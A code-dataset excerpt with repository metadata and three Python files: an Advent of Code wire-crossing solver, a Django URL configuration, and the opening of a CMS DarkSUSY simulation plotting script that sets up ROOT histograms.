Dataset schema (one row per source file):
- blob_id: string (40 chars)
- directory_id: string (40 chars)
- path: string (2-616 chars)
- content_id: string (40 chars)
- detected_licenses: list (0-69 items)
- license_type: string (2 classes)
- repo_name: string (5-118 chars)
- snapshot_id: string (40 chars)
- revision_id: string (40 chars)
- branch_name: string (4-63 chars)
- visit_date: timestamp[us]
- revision_date: timestamp[us]
- committer_date: timestamp[us]
- github_id: int64 (2.91k-686M, nullable)
- star_events_count: int64 (0-209k)
- fork_events_count: int64 (0-110k)
- gha_license_id: string (23 classes)
- gha_event_created_at: timestamp[us]
- gha_created_at: timestamp[us]
- gha_language: string (213 classes)
- src_encoding: string (30 classes)
- language: string (1 class)
- is_vendor: bool
- is_generated: bool
- length_bytes: int64 (2-10.3M)
- extension: string (246 classes)
- content: string (2-10.3M chars)
- authors: list (1 item)
- author_id: string (0-212 chars)
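Each row below pairs this repository metadata with the file's full text in the content column. As a rough illustration only (the dump does not name a source file or loader), a sketch of filtering rows with this schema via pandas, assuming a hypothetical local Parquet export:

import pandas as pd

# "code_files.parquet" is a placeholder path; the dump does not name its source file.
df = pd.read_parquet("code_files.parquet")

# Keep hand-written Python files, mirroring the is_vendor/is_generated flags above.
mask = (
    (df["language"] == "Python")
    & ~df["is_vendor"]
    & ~df["is_generated"]
)
for row in df[mask].itertuples():
    print(row.repo_name, row.path, row.length_bytes)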
Row 1:
blob_id: 2ed205c312b02dc19f7009c9b2b26de639d25969
directory_id: dede18db20fd47c3059bcbf74562e8773096821e
path: /advent/2019/3/advent1.py
content_id: 9e9514de476c5fa21130d1855c5b72d8f43406eb
detected_licenses: []
license_type: no_license
repo_name: conradoboeira/CP
snapshot_id: a70232d916c04d81c93f84de70afb2f252cff4ad
revision_id: 675b098a1c62c7d9bcfa5d8d9a2d7e359b24eef2
branch_name: refs/heads/master
visit_date: 2020-03-31T19:55:21.417786
revision_date: 2020-02-18T03:56:40
committer_date: 2020-02-18T03:56:40
github_id: 152518258
star_events_count: 1
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 2794
extension: py
content:
line1 = input().split(',')
line2 = input().split(',')
pts_marked = []
pt= (0,0)
for com in line1:
direction = com[0]
dist = int(com[1:])
if(direction == 'R'):
end_point = (pt[0]+ dist, pt[1])
if(direction == 'L'):
end_point = (pt[0]- dist, pt[1])
if(direction == 'U'):
end_point = (pt[0], pt[1] + dist)
if(direction == 'D'):
end_point = (pt[0], pt[1]- dist)
if(direction == 'R'):
for i in range (pt[0], end_point[0]+1):
pts_marked.append((i, pt[1]))
elif(direction == 'L'):
for i in range (pt[0], end_point[0]-1, -1):
pts_marked.append((i, pt[1]))
elif(direction == 'U'):
for i in range (pt[1], end_point[1]+1):
pts_marked.append((pt[0], i))
else:
for i in range (pt[1], end_point[1]-1, -1):
pts_marked.append((pt[0], i))
pt = end_point
#print(pts_marked)  # debug: the full list of visited points can be huge
closer_pt = -1
pt = (0,0)
for com in line2:
direction = com[0]
dist = int(com[1:])
if(direction == 'R'):
end_point = (pt[0]+ dist, pt[1])
if(direction == 'L'):
end_point = (pt[0]- dist, pt[1])
if(direction == 'U'):
end_point = (pt[0], pt[1] + dist)
if(direction == 'D'):
end_point = (pt[0], pt[1]- dist)
    if(direction == 'R'):
        for i in range(pt[0], end_point[0]+1):
            point = (i, pt[1])
            if point in pts_marked:
                if point == (0, 0): continue  # the shared origin does not count as a crossing
                dist = abs(point[0]) + abs(point[1])
                if(closer_pt == -1 or dist < closer_pt):
                    closer_pt = dist
    elif(direction == 'L'):
        for i in range(pt[0], end_point[0]-1, -1):
            point = (i, pt[1])
            if point in pts_marked:
                if point == (0, 0): continue
                dist = abs(point[0]) + abs(point[1])
                if(closer_pt == -1 or dist < closer_pt):
                    closer_pt = dist
    elif(direction == 'U'):
        for i in range(pt[1], end_point[1]+1):
            point = (pt[0], i)  # was (pt[0], 1): the y coordinate must follow the loop index
            if point in pts_marked:
                if point == (0, 0): continue
                dist = abs(point[0]) + abs(point[1])
                if(closer_pt == -1 or dist < closer_pt):
                    closer_pt = dist
    else:
        for i in range(pt[1], end_point[1]-1, -1):
            point = (pt[0], i)  # was (pt[0], 1)
            if point in pts_marked:
                if point == (0, 0): continue
                dist = abs(point[0]) + abs(point[1])
                if(closer_pt == -1 or dist < closer_pt):
                    closer_pt = dist
    #print(end_point)
    pt = end_point
print(closer_pt)
authors: ["conrado.boeira@acad.pucrs.br"]
author_id: conrado.boeira@acad.pucrs.br
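The membership test `point in pts_marked` in the file above scans a Python list, so the whole search is quadratic. A minimal sketch of the same closest-crossing idea using set intersection (my rewrite for illustration, not part of the archived file):

def trace(commands):
    # Walk one wire and return every grid point it covers (origin excluded).
    pts, x, y = set(), 0, 0
    steps = {'R': (1, 0), 'L': (-1, 0), 'U': (0, 1), 'D': (0, -1)}
    for com in commands:
        dx, dy = steps[com[0]]
        for _ in range(int(com[1:])):
            x, y = x + dx, y + dy
            pts.add((x, y))
    return pts

# crossings = trace(line1) & trace(line2)
# print(min(abs(x) + abs(y) for x, y in crossings))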
Row 2:
blob_id: e0c7dd836f868d77b664a7a7d8b6cb4c6b8ce3e2
directory_id: 2d33afa6c666d839828473c65c9800df7ff40bec
path: /resume/urls.py
content_id: 2544270ce66dba35c78124edce5ccb3c212356b5
detected_licenses: []
license_type: no_license
repo_name: raphaelmulenda/cv_template
snapshot_id: 5ee1d10a462b3694556bd3ecb07591557df7151a
revision_id: b9fc98d246f1efb50fd2cc404d3511b7214109b2
branch_name: refs/heads/main
visit_date: 2023-08-25T02:39:43.169105
revision_date: 2021-10-19T12:15:28
committer_date: 2021-10-19T12:15:28
github_id: 418229601
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 127
extension: py
content:
from django.urls import path
from . import views

urlpatterns = [
    path("", views.HomePage.as_view(), name="home-page"),
]
authors: ["mulendaraphael@yahoo.fr"]
author_id: mulendaraphael@yahoo.fr
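The route above points at views.HomePage, which is not included in this row. A plausible minimal counterpart (an assumption, not code from the repo) is a TemplateView:

# views.py -- hypothetical sketch; the template name is assumed
from django.views.generic import TemplateView

class HomePage(TemplateView):
    template_name = "home.html"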
Row 3:
blob_id: 59411623046d6332476124e04690091dcaed47f4
directory_id: 25864296fe1d059bba11e999541828ea5eadc5b9
path: /DarkSUSY_mH_125/mGammaD_0275/cT_10000/DarkSUSY_LHE_read.py
content_id: 67e6e5eb47bd296666d7acc0323970e5aa374aa6
detected_licenses: []
license_type: no_license
repo_name: bmichlin/MuJetAnalysis_DarkSusySamples_LHE_13TeV_01
snapshot_id: 17965f8eddf65d24a7c3c8ab81f92c3fc21f4f58
revision_id: 1de8d11f1a2e86874cd92b9819adbad4a6780b81
branch_name: refs/heads/master
visit_date: 2020-06-14T12:54:38.920627
revision_date: 2015-03-18T14:00:07
committer_date: 2015-03-18T14:00:07
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 111093
extension: py
content:
import ROOT, array, os, re, math, random, string
from math import *
from operator import itemgetter
def getStringBetween(name, first, second):
begOf1 = name.find(first)
endOf1 = len(first) + begOf1
begOf2 = name.find(second)
desiredString = name[endOf1:begOf2]
return desiredString
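# Example with the filename used below:
#   getStringBetween("DarkSUSY_mH_125_mGammaD_0275_13TeV_cT_10000_...", "mGammaD_", "_13TeV")
#   returns "0275" -- the substring between the end of `first` and the start of `second`.
# Note it assumes `first` occurs before `second`; otherwise the slice comes out empty.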
muonID = 13
higgsID = 25
n1ID = 3000002
nDID = 3000001
nExit = 80002
#nExit = 1000
gammaDID = 3000022
hMass = "125"
n1Mass = "10"
nDMass = "1"
filename = "DarkSUSY_mH_125_mGammaD_0275_13TeV_cT_10000_madgraph452_bridge224_events80k.lhe"
filename = "DarkSUSY_mH_125_mGammaD_0275_13TeV_cT_10000_madgraph452_bridge224_events80k.lhe"
f = open(filename, 'r')
if len(filename) >= 77:
mass_GammaD = getStringBetween(filename, "mGammaD_","_13TeV_cT")
lifetime_GammaD = getStringBetween(filename, "_cT_","_madgraph452")
energy = getStringBetween(filename, mass_GammaD + "_","TeV_")
mass_Higgs = getStringBetween(filename, "_mH_","_mGammaD_")
lifetime_GammaD_Legend = lifetime_GammaD[0:-2] + "." + lifetime_GammaD[len(lifetime_GammaD)-2:len(lifetime_GammaD)]
    mass_GammaD_Legend = mass_GammaD[0:-3] + "." + mass_GammaD[len(mass_GammaD)-3:]  # last three digits; the original upper bound wrongly used len(lifetime_GammaD)
#mass_GammaD = filename[24:-49]
#lifetime_GammaD = filename[38:-36]
#energy = filename[29:-46]
#mass_Higgs = filename[12:-62]
#lifetime_GammaD_Legend = filename[38:-38] + "." + filename[39:-36]
#mass_GammaD_Legend = filename [24:-52] + "." + filename[25:-49]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "." and len(mass_GammaD_Legend) <= 3: mass_GammaD_Legend = mass_GammaD_Legend + "0"
switch = 0
if lifetime_GammaD_Legend[len(lifetime_GammaD_Legend)-1] == "0":
lifetime_GammaD_Legend = lifetime_GammaD_Legend[:-1]
switch = 1
if lifetime_GammaD_Legend[len(lifetime_GammaD_Legend)-1] == "0" and switch == 1: lifetime_GammaD_Legend = lifetime_GammaD_Legend[:-1]
else:
lifetime_GammaD = "000"
lifetime_GammaD_Legend = "0.00"
mass_GammaD = getStringBetween(filename, "mGammaD_","_13TeV")
energy = getStringBetween(filename, mass_GammaD + "_","TeV")
mass_Higgs = getStringBetween(filename, "_mH_","_mGammaD_")
    mass_GammaD_Legend = mass_GammaD[0:-3] + "." + mass_GammaD[len(mass_GammaD)-3:]  # same slice fix as above
#mass_GammaD = filename[24:-42]
#energy = filename[29:-39]
#mass_Higgs = filename[12:-55]
#mass_GammaD_Legend = filename[24:-45] + "." + filename[25:-42]
#lifetime_GammaD = "000"
#lifetime_GammaD_Legend = "0.00"
print mass_GammaD
print lifetime_GammaD
print lifetime_GammaD_Legend
print mass_GammaD_Legend
BAM = ROOT.TFile("ValidationPlots_mGammaD_" + mass_GammaD + "_" + energy + "_TeV_cT_" + lifetime_GammaD + ".root" , "RECREATE")
execfile("tdrStyle.py")
cnv = ROOT.TCanvas("cnv", "cnv")
txtHeader = ROOT.TLegend(.17,.935,0.97,1.)
txtHeader.SetFillColor(ROOT.kWhite)
txtHeader.SetFillStyle(0)
txtHeader.SetBorderSize(0)
txtHeader.SetTextFont(42)
txtHeader.SetTextSize(0.045)
txtHeader.SetTextAlign(22)
#txtHeader.SetHeader("CMS Simulation")
txtHeader.SetHeader("CMS Simulation (LHE) " + energy + " TeV")
#txtHeader.SetHeader("CMS Prelim. 2011 #sqrt{s} = 7 TeV L_{int} = 5.3 fb^{-1}")
#txtHeader.SetHeader("CMS 2011 #sqrt{s} = 7 TeV L_{int} = 5.3 fb^{-1}")
#txtHeader.SetHeader("CMS Prelim. 2012 #sqrt{s} = 8 TeV L_{int} = 20.65 fb^{-1}")
#txtHeader.SetHeader("CMS 2012 #sqrt{s} = 8 TeV L_{int} = 20.65 fb^{-1}")
txtHeader.Draw()
#info = ROOT.TLegend(0.33,0.8222222,0.9577778,0.9122222)
info = ROOT.TLegend(0.4566667,0.82,0.7822222,0.9066667)
info.SetFillColor(ROOT.kWhite)
info.SetFillStyle(0)
info.SetBorderSize(0)
info.SetTextFont(42)
info.SetTextSize(0.02777778)
info.SetMargin(0.13)
info.SetHeader("#splitline{pp #rightarrow h #rightarrow 2n_{1} #rightarrow 2n_{D} + 2 #gamma_{D} #rightarrow 2n_{D} + 4#mu}{#splitline{m_{h} = " + mass_Higgs + " GeV, m_{n_{1}} = 10 GeV, m_{n_{D}} = 1 GeV}{m_{#gamma_{D}} = " + mass_GammaD_Legend + " GeV, c#tau_{#gamma_{D}} = " + lifetime_GammaD_Legend + " mm}}" )
#info.SetHeader("#splitline{pp #rightarrow h #rightarrow 2n_{1} #rightarrow 2n_{D} + 2 #gamma_{D} #rightarrow 2n_{D} + 4#mu}{#splitline{#gamma_{D} c#tau = "+lifetime_GammaD_Legend + "mm, Mass = " + mass_GammaD_Legend + "GeV}{M of h = " + hMass + "GeV, M of n_{1} = " + n1Mass + "GeV, M of n_{D} = " + nDMass + "GeV}}" )
txtHeader2 = ROOT.TLegend(0.01333333,0.9311111,0.8133333,0.9955556)
txtHeader2.SetFillColor(ROOT.kWhite)
txtHeader2.SetFillStyle(0)
txtHeader2.SetBorderSize(0)
txtHeader2.SetTextFont(42)
txtHeader2.SetTextSize(0.045)
txtHeader2.SetTextAlign(22)
txtHeader2.SetHeader("CMS Simulation #sqrt{s} = " + energy + " TeV")
################################################################################
# pT of muons
################################################################################
Etmiss_dummy = ROOT.TH1F("Etmiss_dummy","Etmiss_dummy", 100, 0, 100)
Etmiss_dummy.SetTitleOffset(1.5, "Y")
Etmiss_dummy.SetTitleOffset(1.4, "X")
Etmiss_dummy.SetTitleSize(0.04,"X")
Etmiss_dummy.SetXTitle("MET = #sum_{n_{D}}#vec{p_{T}} [GeV]")
Etmiss_dummy.SetYTitle("Fraction of events / 1 GeV")
Etmiss_dummy.SetMaximum( 0.1 )
Etmiss = ROOT.TH1F("Etmiss","Etmiss", 100, 0, 100)
Etmiss.SetLineColor(ROOT.kBlue)
Etmiss.SetLineWidth(2)
Etmiss.SetLineStyle(1)
nBins = 125
binMin = 0.0
binMax = 125.0
yMax = 0.25
cTlow = 0
if float(lifetime_GammaD_Legend) != 0:
cTlim = float(lifetime_GammaD_Legend)*5
binwidth = float(lifetime_GammaD_Legend)
numBins = int(cTlim/binwidth)
binwidthRound = round(binwidth,3)
else:
cTlim = 10
binwidth = 1
numBins = int(cTlim/binwidth)
binwidthRound = "1"
formula = "exp(-x/"+ lifetime_GammaD_Legend +")/("+ lifetime_GammaD_Legend + "*(1 - exp(-" + str(cTlim) + "/" + lifetime_GammaD_Legend + ")))"
print formula
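# The string above is the decay-length pdf exp(-x/ctau)/ctau renormalized to the
# plotted window [0, cTlim]: dividing by (1 - exp(-cTlim/ctau)) restores unit area
# after the tail is truncated at cTlim = 5*ctau.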
h_gammaD_cT_dummy = ROOT.TH1F("h_gammaD_cT_dummy", "h_gammaD_cT_dummy", numBins, 0, cTlim)
#h_gammaD_cT_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_dummy.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_cT_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_dummy.SetMaximum( 10 )
h_gammaD_cT = ROOT.TH1F("h_gammaD_cT", "h_gammaD_cT", numBins, 0, cTlim)
h_gammaD_cT.SetLineColor(ROOT.kBlue)
h_gammaD_cT.SetLineWidth(2)
h_gammaD_cT.SetLineStyle(1)
h_gammaD_cT_lab_dummy = ROOT.TH1F("h_gammaD_cT_lab_dummy", "h_gammaD_cT_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_lab_dummy.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_cT_lab_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_lab = ROOT.TH1F("h_gammaD_cT_lab", "h_gammaD_cT_lab", numBins, 0, cTlim)
h_gammaD_cT_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_lab.SetLineWidth(2)
h_gammaD_cT_lab.SetLineStyle(1)
h_gammaD_cT_XY_lab_dummy = ROOT.TH1F("h_gammaD_cT_XY_lab_dummy", "h_gammaD_cT_XY_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_XY_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_XY_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_XY_lab_dummy.SetXTitle("L_{XY} of #gamma_{D} [mm]")
h_gammaD_cT_XY_lab_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_XY_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_XY_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_XY_lab = ROOT.TH1F("h_gammaD_cT_XY_lab", "h_gammaD_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_cT_XY_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_XY_lab.SetLineWidth(2)
h_gammaD_cT_XY_lab.SetLineStyle(1)
h_gammaD_cT_Z_lab_dummy = ROOT.TH1F("h_gammaD_cT_Z_lab_dummy", "h_gammaD_cT_Z_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_Z_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_Z_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_Z_lab_dummy.SetXTitle("L_{Z} of #gamma_{D} [mm]")
h_gammaD_cT_Z_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_cT_Z_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_Z_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_Z_lab = ROOT.TH1F("h_gammaD_cT_Z_lab", "h_gammaD_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_cT_Z_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_Z_lab.SetLineWidth(2)
h_gammaD_cT_Z_lab.SetLineStyle(1)
h_gammaD_1_cT_dummy = ROOT.TH1F("h_gammaD_1_cT_dummy", "h_gammaD_1_cT_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_dummy.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_1_cT_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_dummy.SetMaximum( 10 )
h_gammaD_1_cT = ROOT.TH1F("h_gammaD_1_cT", "h_gammaD_1_cT", numBins, 0, cTlim)
h_gammaD_1_cT.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT.SetLineWidth(2)
h_gammaD_1_cT.SetLineStyle(1)
h_gammaD_1_cT_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_lab_dummy", "h_gammaD_1_cT_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_lab_dummy.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_1_cT_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_lab = ROOT.TH1F("h_gammaD_1_cT_lab", "h_gammaD_1_cT_lab", numBins, 0, cTlim)
h_gammaD_1_cT_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_lab.SetLineWidth(2)
h_gammaD_1_cT_lab.SetLineStyle(1)
h_gammaD_1_cT_XY_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_XY_lab_dummy", "h_gammaD_1_cT_XY_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_XY_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_XY_lab_dummy.SetXTitle("L_{XY} of #gamma_{D} [mm]")
h_gammaD_1_cT_XY_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_XY_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_XY_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_XY_lab = ROOT.TH1F("h_gammaD_1_cT_XY_lab", "h_gammaD_1_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_1_cT_XY_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_XY_lab.SetLineWidth(2)
h_gammaD_1_cT_XY_lab.SetLineStyle(1)
h_gammaD_1_cT_Z_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_Z_lab_dummy", "h_gammaD_1_cT_Z_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_Z_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_Z_lab_dummy.SetXTitle("L_{Z} of #gamma_{D} [mm]")
h_gammaD_1_cT_Z_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_Z_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_Z_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_Z_lab = ROOT.TH1F("h_gammaD_1_cT_Z_lab", "h_gammaD_1_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_1_cT_Z_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_Z_lab.SetLineWidth(2)
h_gammaD_1_cT_Z_lab.SetLineStyle(1)
h_gammaD_2_cT = ROOT.TH1F("h_gammaD_2_cT", "h_gammaD_2_cT", numBins, 0, cTlim)
h_gammaD_2_cT.SetLineColor(ROOT.kRed)
h_gammaD_2_cT.SetLineWidth(2)
h_gammaD_2_cT.SetLineStyle(1)
h_gammaD_2_cT_lab = ROOT.TH1F("h_gammaD_2_cT_lab", "h_gammaD_2_cT_lab", numBins, 0, cTlim)
h_gammaD_2_cT_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_lab.SetLineWidth(2)
h_gammaD_2_cT_lab.SetLineStyle(1)
h_gammaD_2_cT_XY_lab = ROOT.TH1F("h_gammaD_2_cT_XY_lab", "h_gammaD_2_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_2_cT_XY_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_XY_lab.SetLineWidth(2)
h_gammaD_2_cT_XY_lab.SetLineStyle(1)
h_gammaD_2_cT_Z_lab = ROOT.TH1F("h_gammaD_2_cT_Z_lab", "h_gammaD_2_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_2_cT_Z_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_Z_lab.SetLineWidth(2)
h_gammaD_2_cT_Z_lab.SetLineStyle(1)
h_muon_pT_dummy = ROOT.TH1F("h_muon_pT_dummy", "h_muon_pT_dummy", nBins, binMin, binMax)
h_muon_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_pT_dummy.SetTitleOffset(1.35, "Y")
h_muon_pT_dummy.SetXTitle("p_{T} of #mu [GeV]")
h_muon_pT_dummy.SetMaximum( 0.2 )
h_higgs_pT_dummy = ROOT.TH1F("h_higgs_pT_dummy", "h_higgs_pT_dummy", 10, 0, 10)
h_higgs_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_pT_dummy.SetTitleOffset(1.35, "Y")
h_higgs_pT_dummy.SetXTitle("p_{T} of h [GeV]")
h_higgs_pT_dummy.SetMaximum( 1.1 )
h_muon_pZ_dummy = ROOT.TH1F("h_muon_pZ_dummy", "h_muon_pZ_dummy", nBins, binMin, binMax)
h_muon_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_pZ_dummy.SetTitleOffset(1.35, "Y")
h_muon_pZ_dummy.SetXTitle("|p_{Z}| of #mu [GeV]")
h_muon_pZ_dummy.SetMaximum( yMax )
h_higgs_pZ_dummy = ROOT.TH1F("h_higgs_pZ_dummy", "h_higgs_pZ_dummy", 50, 0, 500)
h_higgs_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_pZ_dummy.SetTitleOffset(1.35, "Y")
h_higgs_pZ_dummy.SetXTitle("|p_{Z}| of h [GeV]")
h_higgs_pZ_dummy.SetMaximum( 0.1 )
h_muon_Eta_dummy = ROOT.TH1F("h_muon_Eta_dummy", "h_muon_Eta_dummy", 100, -5, 5)
h_muon_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_muon_Eta_dummy.SetTitleOffset(1.35, "Y")
h_muon_Eta_dummy.SetXTitle("#eta of #mu")
h_muon_Eta_dummy.SetMaximum( 0.1 )
#h_higgs_Eta_dummy = ROOT.TH1F("h_higgs_Eta_dummy", "h_higgs_Eta_dummy", 100,-5,5)
#h_higgs_Eta_dummy.SetYTitle("Fraction of events / 0.1 GeV")
#h_higgs_Eta_dummy.SetTitleOffset(1.35, "Y")
#h_higgs_Eta_dummy.SetXTitle("#eta of h [GeV]")
#h_higgs_Eta_dummy.SetMaximum( 0.1 )
h_muon_Phi_dummy = ROOT.TH1F("h_muon_Phi_dummy", "h_muon_Phi_dummy", 80,-4,4)
h_muon_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_muon_Phi_dummy.SetTitleOffset(1.35, "Y")
h_muon_Phi_dummy.SetXTitle("#phi of #mu [rad]")
h_muon_Phi_dummy.SetMaximum( 0.1 )
h_higgs_Phi_dummy = ROOT.TH1F("h_higgs_Phi_dummy", "h_higgs_Phi_dummy", 80,-4,4)
h_higgs_Phi_dummy.SetYTitle("Fraction of events")
h_higgs_Phi_dummy.SetTitleOffset(1.35, "Y")
h_higgs_Phi_dummy.SetXTitle("#phi of h [rad]")
h_higgs_Phi_dummy.SetMaximum( 1.4 )
h_higgs_p_dummy = ROOT.TH1F("h_higgs_p_dummy", "h_higgs_p_dummy", 50, 0, 500)
h_higgs_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_p_dummy.SetTitleOffset(1.35, "Y")
h_higgs_p_dummy.SetXTitle("p of h [GeV]")
h_higgs_p_dummy.SetMaximum( 0.1 )
h_higgs_M_dummy = ROOT.TH1F("h_higgs_M_dummy", "h_higgs_M_dummy", 220, 80.5, 300.5)
h_higgs_M_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_M_dummy.SetTitleOffset(1.35, "Y")
h_higgs_M_dummy.SetXTitle("Mass of h [GeV]")
h_higgs_M_dummy.SetLabelSize(0.03,"X")
h_higgs_M_dummy.SetMaximum( 1.5 )
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_p = ROOT.TH1F("h_higgs_p", "h_higgs_p", 50, 0, 500)
h_higgs_p.SetLineColor(ROOT.kBlue)
h_higgs_p.SetLineWidth(2)
h_higgs_p.SetLineStyle(1)
h_higgs_M = ROOT.TH1F("h_higgs_M", "h_higgs_M", 10, 120.5, 130.5)
h_higgs_M.SetLineColor(ROOT.kBlue)
h_higgs_M.SetLineWidth(2)
h_higgs_M.SetLineStyle(1)
h_higgs_pT = ROOT.TH1F("h_higgs_pT", "h_higgs_pT", 10, 0, 10)
h_higgs_pT.SetLineColor(ROOT.kBlue)
h_higgs_pT.SetLineWidth(2)
h_higgs_pT.SetLineStyle(1)
h_n1_1_pT_dummy = ROOT.TH1F("h_n1_1_pT_dummy", "h_n1_1_pT_dummy", 70, 0, 70)
h_n1_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_pT_dummy.SetXTitle("p_{T} of n_{1} [GeV]")
h_n1_1_pT_dummy.SetMaximum( yMax )
h_higgs_pZ = ROOT.TH1F("h_higgs_pZ", "h_higgs_pZ", 50, 0, 500)
h_higgs_pZ.SetLineColor(ROOT.kBlue)
h_higgs_pZ.SetLineWidth(2)
h_higgs_pZ.SetLineStyle(1)
h_n1_1_pZ_dummy = ROOT.TH1F("h_n1_1_pZ_dummy", "h_n1_1_pZ_dummy", 300, 0, 300)
h_n1_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_pZ_dummy.SetXTitle("|p_{Z}| of n_{1} [GeV]")
h_n1_1_pZ_dummy.SetMaximum( 0.1 )
#h_higgs_Eta = ROOT.TH1F("h_higgs_Eta", "h_higgs_Eta", 50,0,5)
#h_higgs_Eta.SetLineColor(ROOT.kBlue)
#h_higgs_Eta.SetLineWidth(2)
#h_higgs_Eta.SetLineStyle(1)
h_n1_1_Eta_dummy = ROOT.TH1F("h_n1_1_Eta_dummy", "h_n1_1_Eta_dummy", 100,-5,5)
h_n1_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_n1_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_Eta_dummy.SetXTitle("#eta of n_{1}")
h_n1_1_Eta_dummy.SetMaximum( 0.1 )
h_higgs_Phi = ROOT.TH1F("h_higgs_Phi", "h_higgs_Phi", 80,-4,4)
h_higgs_Phi.SetLineColor(ROOT.kBlue)
h_higgs_Phi.SetLineWidth(2)
h_higgs_Phi.SetLineStyle(1)
h_n1_1_Phi_dummy = ROOT.TH1F("h_n1_1_Phi_dummy", "h_n1_1_Phi_dummy", 80,-4,4)
